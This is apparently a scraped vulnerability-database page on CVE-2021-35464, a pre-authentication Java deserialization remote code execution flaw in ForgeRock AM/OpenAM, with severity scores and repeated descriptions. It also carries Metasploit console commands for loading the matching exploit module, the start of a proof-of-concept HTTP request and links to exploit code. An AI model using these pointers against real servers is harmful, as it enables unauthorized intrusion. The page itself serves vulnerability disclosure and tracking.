CVE-2021-35464

Published: 22/07/2021 Updated: 02/08/2021

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

ForgeRock AM server prior to 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier

Vulnerable Product	Search on Vulmon	Subscribe to Product
forgerock am
forgerock openam

This Metasploit module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution The vulnerability arises from a Java deserialization flaw in OpenAM's implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint Successful ...

ForgeRock Access Manager/OpenAM version 1463 unauthenticated remote code execution exploit ...

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable ...

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus is susceptible to the same issue.

msf > use exploit/multi/http/cve_2021_35464_forgerock_openam
msf exploit(cve_2021_35464_forgerock_openam) > show targets
    ...targets...
msf exploit(cve_2021_35464_forgerock_openam) > set TARGET < target-id >
msf exploit(cve_2021_35464_forgerock_openam) > show options
    ...show and set options...
msf exploit(cve_2021_35464_forgerock_openam) > exploit

openam-CVE-2021-35464 tomcat 执行命令回显

openam CVE-2021-35464 tomcat 执行命令回显项目基于 ysoserial 和 Java-Rce-Echo 构建项目需要在依赖中加入ysoserialjar和jato-1463jar POST /OpenAM/ccversion/Version HTTP/11 Host: phplocal:8081 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64) AppleWebKit/53736 (KHTML, like Gecko) Chrome/9104472124 Safari/53736 Acc

CWE-502 http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html https://bugster.forgerock.org https://backstage.forgerock.com/knowledge/kb/article/a47894244 https://nvd.nist.gov https://github.com/Y4er/openam-CVE-2021-35464 https://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html

CVE-2021-35464

Vulnerability Summary

Vulnerability Trend

Exploits

Metasploit Modules

Github Repositories

References

Vulmon Search

About

Products

Connect